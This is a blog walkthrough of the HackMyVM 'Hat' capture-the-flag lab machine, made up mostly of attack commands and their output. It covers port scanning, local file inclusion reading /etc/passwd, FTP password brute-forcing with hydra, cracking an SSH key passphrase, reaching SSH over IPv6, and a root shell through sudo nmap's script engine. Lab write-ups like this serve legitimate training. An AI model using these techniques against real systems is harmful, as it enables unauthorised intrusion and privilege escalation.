Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Hat Walkthrough

HackMyVm Hat Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hat

Key points: IPv6

Nmap scan ports.

 nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.0012s latency).
 Not shown: 65532 closed ports
 PORT      STATE    SERVICE VERSION
 22/tcp    filtered ssh
 80/tcp    open     http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 65535/tcp open     ftp     pyftpdlib 1.5.4
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |  Connected to: 192.168.56.100:65535
 |  Waiting for username.
 |  TYPE: ASCII; STRUcture: File; MODE: Stream
 |  Data connection closed.
 |_End of status.

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 10701]
 /logs                 (Status: 301) [Size: 315] [--> http://192.168.56.100/logs/]
 /php-scripts          (Status: 301) [Size: 322] [--> http://192.168.56.100/php-scripts/]

Scan php-scripts, found file.php.

 ~ gobuster dir -u http://192.168.56.100/php-scripts -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o scripts.log
 /index.html           (Status: 200) [Size: 7]
 /file.php             (Status: 200) [Size: 0]

Fuzz the param of file.php.

 ~ wfuzz -u 'http://192.168.56.100/php-scripts/file.php?FUZZ=/etc/passwd'    -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0           
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000713:   200        26 L     38 W       1404 Ch     "6"      

Get user name.

 ~ curl 'http://192.168.56.100/php-scripts/file.php?6=/etc/passwd'      
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin            
 ...
 cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash

Scan folder logs. Get ftp user name from vsftpd.log

 ~ gobuster dir -u http://192.168.56.100/logs -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,log -b 401,403,404,500
  --wildcard   -o logs.log
  ...
  ===============================================================
 /index.html           (Status: 200) [Size: 4]
 /vsftpd.log           (Status: 200) [Size: 1834]

Bruteforce password of ftp.

 ~ hydra -l ftp_s3cr3t -P /usr/share/wordlists/rock_ascii.txt -e nsr 192.168.56.100 -s 65535  ftp -t64 -F           ...
 [65535][ftp] host: 192.168.56.100   login: ftp_s3cr3t   password: cowboy

Get 2 files: note and id_rsa.

 ~ cat note                                                                              
 
 Hi,
 
 We have successfully secured some of our most critical protocols ... no more worrying!
 
 
 Sysadmin

Port 22 is filtered. We can not connect it directly, but it is open. So let's try IPV6.

Modify /etc/sysctl.conf  to enable IPv6.  inet6 means IPv6 is enabled.

 ~ cat /etc/sysctl.conf
 ...
 net.ipv6.conf.all.disable_ipv6 = 0
 net.ipv6.conf.default.disable_ipv6 = 0
 net.ipv6.conf.lo.disable_ipv6 = 0
 ~ ifconfig
 ...
 eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
         inet 192.168.56.150  netmask 255.255.255.0  broadcast 192.168.56.255
         inet6 fe80::ff1:d602:48fd:2485  prefixlen 64  scopeid 0x20<link>
         ether 00:0c:29:35:d5:69  txqueuelen 1000  (Ethernet)
 ...

Find machines in local link IPv6 network.

 ~ ping6 -c2 -n -I eth1 ff02::1   
 ping6: Warning: source address might be selected on device other than: eth1
 PING ff02::1(ff02::1) from :: eth1: 56 data bytes
 64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=1 ttl=64 time=0.033 ms
 64 bytes from fe80::a00:27ff:fe17:10a4%eth1: icmp_seq=1 ttl=64 time=0.615 ms
 64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=2 ttl=64 time=0.049 ms

Test if the machine can be visited from ipv6 address.

 ~ nmap -p- fe80::a00:27ff:fe17:10a4%eth1 -6     
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-13 15:23 CST
 Nmap scan report for fe80::a00:27ff:fe17:10a4
 Host is up (0.00060s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE
 22/tcp open  ssh
 80/tcp open  http
 ~ curl 'http://[fe80::a00:27ff:fe17:10a4%eth1]/index.html'
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
     <title>Apache2 Debian Default Page: It works</title>
     <style type="text/css" media="screen">
 ...

Decrypt id_rsa.

 $ python2 /usr/share/john/ssh2john.py id_rsa  > crack.txt
 $ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
 Using default input encoding: UTF-8
 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
 Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
 Cost 2 (iteration count) is 2 for all loaded hashes
 Will run 2 OpenMP threads
 Note: This format may emit false positives, so it will keep trying even after
 finding a possible candidate.
 Press 'q' or Ctrl-C to abort, almost any other key for status
 ilovemyself      (id_rsa)
 1g 0:00:00:11 46.01% (ETA: 20:23:54) 0.09082g/s 607973p/s 607973c/s 607973C/s katim03..katilsimbu_1
 Session aborted

Login ssh through ipv6.

 ~ ssh cromiphi@fe80::a00:27ff:fe17:10a4%eth1 -i id_rsa    
 Enter passphrase for key 'id_rsa':
 Linux Hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/cromiphi/.Xauthority does not exist
 cromiphi@Hat:~$

Check sudo -l.

 cromiphi@Hat:~$ sudo -l
 Matching Defaults entries for cromiphi on Hat:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User cromiphi may run the following commands on Hat:
     (root) NOPASSWD: /usr/bin/nmap

Get root.

 cromiphi@Hat:~$ echo 'os.execute("/bin/bash -i")' > exp
 cromiphi@Hat:~$ sudo nmap --script=exp
 Starting Nmap 7.70 ( https://nmap.org ) at 2021-10-13 10:38 CEST
 NSE: Warning: Loading 'exp' -- the recommended file extension is '.nse'.
 root@Hat:/home/cromiphi# uid=0(root) gid=0(root) grupos=0(root)
 Hat


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.1